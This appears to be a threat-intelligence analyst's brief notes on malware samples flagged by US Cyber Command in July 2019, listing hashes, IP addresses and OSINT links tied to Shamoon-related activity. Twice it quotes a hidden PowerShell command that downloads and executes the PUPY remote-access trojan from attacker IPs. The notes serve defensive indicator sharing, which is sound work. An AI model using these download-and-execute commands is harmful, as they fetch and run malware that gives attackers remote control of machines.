Created
July 2, 2019 20:17
Cyber July 2nd 2019 Quick Notes
CyberCom
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet, 2017-01-14 03:35Z
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
> Powershell: http://69.87.223.26:8080/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
> Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
> http://139.59.46.154:3485/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
> Downloader for PuPy
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader
Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704